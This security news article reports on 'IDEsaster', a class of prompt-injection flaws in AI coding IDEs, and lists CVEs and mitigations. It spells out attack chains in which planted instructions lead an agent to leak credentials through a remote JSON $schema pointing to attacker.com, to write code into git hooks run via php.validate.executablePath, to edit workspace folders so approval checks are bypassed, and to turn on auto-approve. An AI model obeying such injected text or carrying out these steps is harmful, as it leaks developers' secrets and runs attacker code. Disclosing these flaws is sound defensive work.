Researchers report a vulnerability class in AI-Powered development tools dubbed IDEsaster
Take action: If you use AI coding assistants like GitHub Copilot, Cursor, or Claude Code, update to the latest versions immediately and configure them to always require your approval before taking actions. Only use these tools with trusted code repositories, and carefully review any code comments, README files, or MCP server configurations for suspicious content before letting your AI assistant analyze them.
Learn More
Security researcher Ari Marzouk is reporting a novel class of vulnerabilities dubbed "IDEsaster" that affects virtually all AI-powered integrated development environments (IDEs) and coding assistants.
The six-month investigation identified over 30 separate security vulnerabilities across more than 10 market-leading products, resulting in 24 assigned CVE identifiers and security advisories from major vendors including AWS. The research revealed that 100% of tested AI IDEs and coding assistants were vulnerable to this new attack chain, which uses features from the base IDE layer itself instead of targeting application components.
Affected products include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, JetBrains Junie, Cline, Gemini CLI, and Claude Code.
The IDEsaster vulnerability class exploits a how AI agents interact with underlying IDE features. Unlike previously disclosed vulnerabilities that targeted narrow components such as vulnerable tools or agent configurations, IDEsaster weaponizes legitimate legacy features of base IDEs that were never designed with autonomous AI agents in mind. The root of IDEsaster is that IDEs were not initially built with AI agents in mind, leading to unpredictable results when AI components were added to existing applications.
Three primary attack vectors have been identified:
Remote JSON Schema attacks that trigger automatic GET requests to attacker-controlled domains
Attack sequence:
- Attacker injects malicious instructions through a README file, comment in code, or MCP server
- AI agent is tricked into reading sensitive information (API keys, credentials, source code)
- Agent creates a
.jsonfile with a remote schema pointing to attacker's server with stolen data as URL parameter: { "$schema": "https://attacker.com/log?data=STOLEN_API_KEY_HERE" }The IDE automatically makes a GET request to validate the schema, leaking the data to the attacker
IDE Settings Overwrite vulnerabilities that manipulate configuration files to execute arbitrary commands
Attack sequence:
- Prompt injection tricks the AI agent into editing an existing executable file (like
.git/hooks/pre-commit.samplewhich exists in every Git repository) - Agent inserts malicious code into this executable
- Agent modifies
.vscode/settings.jsonto setphp.validate.executablePathto point to the malicious file - Agent creates any PHP file in the project
VS Code automatically executes the malicious code to "validate" the PHP file
- Prompt injection tricks the AI agent into editing an existing executable file (like
Multi-Root Workspace Settings attacks in Visual Studio Code that provide additional exploitation paths.
Attack sequence:
- Agent modifies the
*.code-workspacefile to change folder paths to any location on the filesystem that contains writable executable files - This bypasses typical "human-in-the-loop" protections for editing files outside the project workspace
- Agent edits the now-in-workspace executable file with malicious code
- Agent modifies workspace settings to set
php.validate.executablePathto the malicious file - Agent creates a PHP file, triggering automatic execution
{ "folders": [ {"path": "/tmp"}, // Changed to system directory with writable files {"path": "/original/project"} ], "settings": { "php.validate.executablePath": "/tmp/malicious_script.sh" } }
- Agent modifies the
Real-World Attack Scenarios
Infected Repository A developer clones a repository that contains a hidden prompt injection in a comment or README. When they ask their AI assistant to help with the code, the agent:
- Reads their AWS credentials from
.aws/config - Creates a malicious JSON file that exfiltrates the credentials to attacker's server
- The IDE automatically sends the credentials when validating the JSON schema
Supply Chain Attack An attacker compromises a popular MCP server or rule file repository. When developers install or update, the malicious instructions:
- Modify Git hook files with backdoor code
- Update IDE settings to execute the backdoor
- Spread to other projects as the developer works, creating a "zombie AI" network
Invisible Payload Using invisible Unicode characters, an attacker embeds instructions that are not visible to the developer but are parsed by the LLM. The agent:
- Enables "YOLO mode" by setting
"chat.tools.autoApprove": true - Downloads malware and establishes command-and-control connection
- All without the developer seeing any suspicious instructions
The following CVEs have been assigned for vulnerabilities affecting various AI IDE products.
- GitHub Copilot vulnerabilities include CVE-2025-53773 (CVSS score 7.8) for command injection leading to remote code execution, and CVE-2025-64660 for multi-root workspace exploitation.
- Cursor has been assigned CVE-2025-49150 for remote JSON schema data exfiltration, CVE-2025-54130 for IDE settings overwrite, and CVE-2025-61590 for multi-root workspace manipulation.
- Roo Code has CVE-2025-53097 and CVE-2025-53536 and CVE-2025-58372 for Roo Code's multi-root workspace vulnerability
- JetBrains Junie has CVE-2025-58335
- Zed.dev has CVE-2025-55012
- AWS issued security bulletin AWS-2025-019 about prompt injection issues in Amazon Q Developer and Kiro.
Major vendors have responded with patches and security advisories, but some like Claude Code opted to address the risks through documentation updates and security warnings rather than code fixes.
Developers using AI IDEs to only work with trusted projects and files, continuously monitor MCP servers for changes, review added sources for hidden instructions, and always configure AI agents to require human-in-the-loop approval.
Developers building AI IDEs, should implement capability-scoped tools with least privilege principles, monitor IDE features for potential attack vectors, adopt an "assume breach" zero-trust approach, minimize injection vectors and sandboxing for executed commands.